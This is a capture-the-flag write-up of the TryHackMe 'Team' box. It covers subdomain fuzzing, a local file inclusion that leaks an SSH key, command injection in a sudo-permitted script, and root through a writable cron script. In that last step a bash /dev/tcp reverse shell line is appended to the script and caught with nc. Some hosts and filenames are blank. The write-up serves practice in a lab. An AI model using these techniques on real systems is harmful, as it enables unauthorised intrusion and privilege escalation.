Beginner friendly boot2root machine
It is aimed at beginners as I often see boxes that are “easy” but are often a bit harder!

Whilst not difficult by any means, I still think this one will trip a few noobs up. This is Team from THM.


FTP, SSH and HTTP; the triumvirate.


No anon access; moving on. Actually let’s stay here for a bit. This box had a whole series of breadcrumbs I guess the creator thought you would follow; I circumvented quite a bit at the start and that includes the part involving FTP. But we can discuss it anyway - I do need to skip around a bit though.

If we go to the IP for the page in a browser, we get the Apache default page and in the page source we get:

If you see this add ‘team.thm’ to your hosts!

So if we do that we get an extra page. If you go gobusting or whatever, you can find this page: http://team.thm/scripts/script.txt, and it contains (amongst other things) this line:

Note to self had to change the extension of the old “script” in this folder, as it has creds in

So if we go to http://team.thm/scripts/script.old we can get the old version which contains credentials, which we can use to login to FTP. If we do that, we can get a file with these contents:

Dale I have started coding a new website in PHP for the team to use, this is currently under development. It can be found at “.dev” within our domain.
Also as per the team policy please make a copy of your “id_rsa” and place this in the relevent config file.

Right, so we’ve got two users (Dale and Gyles), a dev subdomain and a copy of an SSH key. Well, I missed all of this.


There is a hint on the THM room page:

As the “dev” site is under contruction maybe it has some flaws? “url?=” + “This rooms picture”

So we know there is a dev subdomain. Or we can find it easily by fuzzing:

wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://team.thm" -H "Host:" -t 42 --hh 11366

000000019: 200 9 L 20 W 187 Ch “dev”

We add this to /etc/hosts and have a look; we’ve got an easily exploited LFI; e.g.

Now bear in mind that I had skipped the FTP part so I didn’t know I was specifically looking for an ssh key in a config file, although I certainly tried looking in /home/dale/.ssh and /home/gyles/.ssh; there are no keys there. I was expecting possibly log poisoning at this point, so I tried reading the logs for apache, vsftpd, auth etc. Nothing. No /proc/self/environ, no mail, nada.

Eventually I user Burp Turbo Intruder on a big list of linux files and found the target -

For some reason, this file contains a copy of the SSH private key for dale; who knows why that would be the case. Anyway; onwards.

On the box

We SSH in as dale, no problem. What can he do?

└─# ssh -i dale_key dale@team.thm 
Warning: Permanently added the ECDSA host key for IP address '' to the list of known hosts.
Last login: Mon Jan 18 10:51:32 2021
dale@TEAM:~$ sudo -l
Matching Defaults entries for dale on TEAM:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dale may run the following commands on TEAM:
    (gyles) NOPASSWD: /home/gyles/admin_checks

And what is that?

dale@TEAM:~$ cat /home/gyles/admin_checks

printf "Reading stats.\n"
sleep 1
printf "Reading stats..\n"
sleep 1
read -p "Enter name of person backing up the data: " name
echo $name  >> /var/stats/stats.txt
read -p "Enter 'date' to timestamp the file: " error
printf "The Date is "
$error 2>/dev/null

date_save=$(date "+%F-%H-%M")
cp /var/stats/stats.txt /var/stats/stats-$date_save.bak

printf "Stats have been backed up\n"

Alright. This took me a bit to figure out but on:

read -p “Enter ‘date’ to timestamp the file: “ error

Whatever is entered is executed as a command. To exploit:

dale@TEAM:~$ sudo -u gyles /home/gyles/admin_checks
Reading stats.
Reading stats..
Enter name of person backing up the data: doesnt matter
Enter 'date' to timestamp the file: sh
The Date is id
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
python3 -c 'import pty;pty.spawn("/bin/bash");'
gyles@TEAM:~$ id;hostname
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)


I run linpeas as gyles and it screams at me about /usr/local/bin. Here we have a writeable script running as a root cron. Nice.

gyles@TEAM:/usr/local/bin$ ls -lash
total 12K
4.0K drwxrwxr-x  2 root admin 4.0K Jan 17 20:36 .
4.0K drwxr-xr-x 10 root root  4.0K Jan 15 19:49 ..
4.0K -rwxrwxr-x  1 root admin   65 Jan 17 20:36
gyles@TEAM:/usr/local/bin$ cat 
cp -r /var/www/team.thm/* /var/backups/www/team.thm/
gyles@TEAM:/usr/local/bin$ printf 'bash -i >& /dev/tcp/ 0>&1\n' >>
gyles@TEAM:/usr/local/bin$ cat
cp -r /var/www/team.thm/* /var/backups/www/team.thm/
bash -i >& /dev/tcp/ 0>&1

And with a listener:

└─# nc -nvlp 1234                                                                                             
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 58140
bash: cannot set terminal process group (17582): Inappropriate ioctl for device
bash: no job control in this shell
root@TEAM:~# cd /root
cd /root
root@TEAM:~# ls -lash
ls -lash
total 52K
4.0K drwx------  6 root root 4.0K Jan 17 19:28 .
4.0K drwxr-xr-x 23 root root 4.0K Jan 15 19:51 ..
8.0K -rw-------  1 root root 7.0K Jan 21 19:20 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
4.0K drwx------  2 root root 4.0K Jan 15 22:10 .cache
4.0K drwx------  4 root root 4.0K Jan 15 22:18 .gnupg
4.0K drwxr-xr-x  3 root root 4.0K Jan 15 20:30 .local
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-r--r--  1 root root   18 Jan 15 21:26 root.txt
4.0K -rw-r--r--  1 root root   66 Jan 17 16:07 .selected_editor
4.0K drwx------  2 root root 4.0K Jan 15 20:00 .ssh
   0 -rw-r--r--  1 root root    0 Jan 16 22:42 .sudo_as_admin_successful
4.0K -rw-r--r--  1 root root  215 Jan 17 14:57 .wget-hsts

Done. It never ceases to amaze how every single time a new challenge is released someone is asking for hints on the discord almost immediately, even though every new challenge has a 3 day embargo on hints. If this applies to you, have a good hard look at yourself.